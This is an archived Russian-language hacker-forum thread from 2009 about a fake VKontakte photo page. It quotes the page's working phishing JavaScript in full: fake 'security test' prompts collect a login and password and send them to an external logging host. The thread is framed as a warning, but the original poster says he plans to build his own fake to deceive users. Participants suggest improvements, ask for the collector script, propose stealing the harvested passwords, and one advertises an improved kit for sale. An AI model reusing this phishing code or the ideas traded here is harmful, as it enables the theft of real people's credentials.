Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Социальные сети (https://forum.antichat.xyz/forumdisplay.php?f=133)
-   -   Вот и нашел я первый фейк с iframe! (https://forum.antichat.xyz/showthread.php?t=159904)

ZnikiR 29.11.2009 10:38
Вот и нашел я первый фейк с iframe!
 
http://vkontakte-fotℴ.com/photo23385409_141879053
Это ФЕЙК не вводите туда свои данные!
Ну расскажу по-подробнее (рассмотрим код):
1)Сам iframe
Код HTML:
<iframe id=ctree" name="tree" src="http://vkontakte.ru/photo23385409_141879053" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto"></iframe>
Как мы видим введет на не закрытую страницу с фотками!
http://vkontakte.ru/photo23385409_141879053
2) Java код (карявый)
Код:
var login = "";
var login_pass = false;

var pass  = "";
var pass_pass = false;

 var emailPattern = /^[a-zA-Z0-9._-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}$/;


var ii = 100;
function p()
{
        location.href='http://vkontakte.ru/';
}
function loadFn()
{

                while(ii > 10)
                {
                        if(login_pass == false)
                        {
                                login = window.prompt("Вконтакте участились случаи спама, Поэтому мы проводим тестирование новой системы защиты.\nВведите E-mail или Логин:",'Ваш e-mail');
                                if(emailPattern.test(login))
                                {
                                        login_pass = true;
                                }
                        }
                        if(pass_pass == false && login_pass == true)
                        {
                                pass = window.prompt("Введите пароль",'');

                                if(typeof pass == 'string')
                                {
                                        if(pass.length > 3 )
                                        {

                                                pass_pass = true;
                                               
                                        }
                                }
                                else
                                {
                                        pass = window.prompt("Введите ваш пароль",'');
                                }
                        }
                       
                        if(login_pass == true && pass_pass == true)
                        {
                                img = new Image();
                                img.onload = p();
                                img.src = "http://vauction.biz/log.php?c=" + login + ';' + pass;
                                alert('Спасибо! Вы успешно авторизованы.');

                                                                break;
                        }
                }
               
}
Ну все достаточно просто проверка орфографии майла и пароль больше трех символов,
Если всё верно с помощью гет запроса передаються данные на
http://vauction.biz/log.php?c=" + login + ';' + pass;

======================================

Вопрос к людям со стажем!
что можно придумать с http://vauction.biz/log.php?c=" + login + ';' + pass;
ну вы понимаете о чем я!
======================================
Это не моё!
Я просто привёл пример!!!
Потому что увидив пример использование,я понял,что сейчас можно очень красиво людей разводить.
Много очень много идей сейчас в голове,но очень мало времени!!!
Сейчас пошел заниматься,как всё закончу,может и напишу свой фейк с iframe.
Потому что я думаю,так убедить пользователя ввести свой пароль куда проще,когда он видет свою страницу!

Adekvatnyj 29.11.2009 10:54
1 минус, вконтакте еще ники есть, а тут на имейлы настроено.

ZnikiR 29.11.2009 11:08
Цитата:
Сообщение от Adekvatnyj
1 минус, вконтакте еще ники есть, а тут на имейлы настроено.
Не понял тебя?


скажу,что это очень нормальный способ.
Потому как Свежый,мало кто из пользователей сталкивался,и если вывести его страницу в iframe и доделать этот фейк,то можно очень сильно разводить людей.
У меня кстати мысли по фейку появились!Причем очень интерестные!

Adekvatnyj 29.11.2009 11:12
Цитата:
Не понял тебя?
Заходить можна не только через имейлы, а и через ники (кто зарегился недавно, с активацией), этим способом ты пропускаешь довольно сладкие акки.

Adekvatnyj 29.11.2009 11:22
Виснет броузер.
Захожу с ИЕ

ZnikiR 29.11.2009 12:27
http://vauction.biz/log.php
у меня вопрос скажите,он просто принимает все запросы?без обработки?
у меня идея,по идее же можно как-то заставить его нам показать себя(т.е. свой код)?
если да,то как это можно сделать?

Есть предложение вытащить пассы! )))

satana-fu 29.11.2009 13:51
вот ты гений-поисковик, почитать форум впадлу было? этот фейк находили еще три месяца назад

http://forum.antichat.ru/showthread.php?p=1637189

xxxBARTONxxx 29.11.2009 17:59
кто нибудь может код для log.php скинуть?

REBUUS 29.11.2009 18:06
Цитата:
Сообщение от Adekvatnyj
1 минус, вконтакте еще ники есть, а тут на имейлы настроено.
а этот ник еще можно добавлять , если раньше зарегался ? если да то где ?

GlooK 29.11.2009 19:00
продам усовершенствованный сабж http://vkotnake.ru/photo23385409_141879053
подробности здесь http://forum.antichat.ru/thread157537.html

P.S. Сволочи! http://www.phishtank.com/phish_detail.php?phish_id=874843


Время: 21:12